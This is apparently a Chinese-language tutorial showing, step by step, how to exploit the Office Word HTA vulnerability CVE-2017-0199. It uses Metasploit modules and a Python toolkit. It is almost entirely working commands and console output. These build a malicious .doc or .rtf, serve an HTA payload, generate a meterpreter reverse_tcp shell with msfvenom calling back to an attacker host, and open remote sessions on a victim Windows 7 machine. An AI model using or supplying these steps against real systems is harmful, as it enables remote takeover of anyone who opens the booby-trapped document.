0x01 通过 Metasploit展开目录
准备展开目录
更新 MSF 到最新。
下载对应 Exploit
cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/modules/exploits/windows/fileformat/office_word_hta.rb
下载 rtf 文件
cd /usr/share/metasploit-framework/data/exploits wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/data/exploits/cve-2017-0199.rtf
开启 HTA 服务展开目录
msf > use exploit/windows/misc/hta_server msf exploit(hta_server) > show options Module options (exploit/windows/misc/hta_server): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Powershell x86 msf exploit(hta_server) > run [*] Exploit running as background job. [*] Started reverse TCP handler on 10.14.81.6:4444 [*] Using URL: http://0.0.0.0:8080/5Fzi0vL.hta [*] Local IP: http://10.14.81.6:8080/5Fzi0vL.hta msf exploit(hta_server) > [*] Server started. msf exploit(hta_server) >
生成 payload展开目录
msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta msf exploit(office_word_hta) > show options Module options (exploit/windows/fileformat/office_word_hta): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME no The file name. TARGETURI http://example.com/test.rtf yes The path to a online hta file. Exploit target: Id Name -- ---- 0 Microsoft Office Word msf exploit(office_word_hta) > set TARGETURI http://10.14.81.6:8080/5Fzi0vL.hta TARGETURI => http://10.14.81.6:8080/5Fzi0vL.hta msf exploit(office_word_hta) > set FILENAME msf.doc FILENAME => msf.doc msf exploit(office_word_hta) > run [+] msf.doc stored at /root/.msf4/local/msf.doc msf exploit(office_word_hta) >
将生成的 msf.doc 文件复制到 Windows 上,打开即可获取一个会话。
msf exploit(office_word_hta) > [*] 10.14.89.247 hta_server - Delivering Payload [*] 10.14.89.247 hta_server - Delivering Payload [*] Sending stage (957487 bytes) to 10.14.89.247 [*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:10576) at 2017-04-19 21:58:03 +0800 msf exploit(office_word_hta) > sessions -i Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/windows hp-PC\hp @ HP-PC 10.14.81.6:4444 -> 10.14.89.247:10576 (10.14.89.247) msf exploit(office_word_hta) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : HP-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 System Language : zh_CN Domain : WORKGROUP Logged On Users : 4 Meterpreter : x86/windows
0x02 通过 Toolkit展开目录
准备展开目录
下载 Toolkit。
生成 payload展开目录
python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
生成 meterpreter payload展开目录
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
开启 HTA 服务展开目录
python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
受害者打开文档后收到 shell。
[*] Started reverse TCP handler on 10.14.81.6:4444 [*] Starting the payload handler... [*] Sending stage (957487 bytes) to 10.14.89.247 [*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:12775) at 2017-04-19 23:09:03 +0800 meterpreter > sysinfo Computer : HP-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 System Language : zh_CN Domain : WORKGROUP Logged On Users : 4 Meterpreter : x86/windows meterpreter > screenshot [-] stdapi_ui_desktop_screenshot: Operation failed: Access is denied.